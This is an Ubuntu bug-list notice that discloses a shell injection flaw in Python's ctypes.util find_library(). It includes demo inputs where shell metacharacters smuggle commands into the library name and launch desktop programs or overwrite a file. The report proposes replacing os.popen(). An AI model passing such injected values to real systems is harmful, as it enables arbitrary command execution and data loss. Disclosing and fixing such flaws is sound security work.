[Bug 1512068] [NEW] Python ctypes.util , Shell Injection in find_library()

Bernd Dietzel Sun, 01 Nov 2015 01:46:21 -0800

Public bug reported:

https://github.com/Legrandin/ctypes/issues/1


The find_library() function can execute code when special chars like ;|`<>$ are 
in the name.
The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

Demo Exploits for Linux :
====================

>>> from ctypes.util import find_library
>>> find_library(";xeyes")                    # runs  xeyes 
>>> find_library("|xterm")                    # runs terminal
>>> find_library("&gimp")                    # runs gimp
>>> find_library("$(nautilus)")              # runs filemanager
>>> find_library(">test")                       # creates, and if exists, 
>>> erases a file "test"

==== Traceback ====

>>> find_library("`xmessage hello`")    # shows a message, press ctrl+c for 
>>> Traceback
^CTraceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
    return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
  File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
    trace = f.read()
KeyboardInterrupt

ProblemType: Bug
DistroRelease: Ubuntu 15.10
Package: libpython2.7-stdlib 2.7.10-4ubuntu1
ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
Uname: Linux 4.2.0-16-generic x86_64
ApportVersion: 2.19.1-0ubuntu4
Architecture: amd64
CurrentDesktop: XFCE
Date: Sun Nov  1 10:34:38 2015
InstallationDate: Installed on 2015-10-09 (22 days ago)
InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
SourcePackage: python2.7
UpgradeStatus: No upgrade log present (probably fresh install)

** Affects: python2.7 (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: amd64 apport-bug wily

** Attachment removed: "JournalErrors.txt"
   
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+attachment/4510277/+files/JournalErrors.txt

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1512068] [NEW] Python ctypes.util , Shell Injection in find_library()

Reply via email to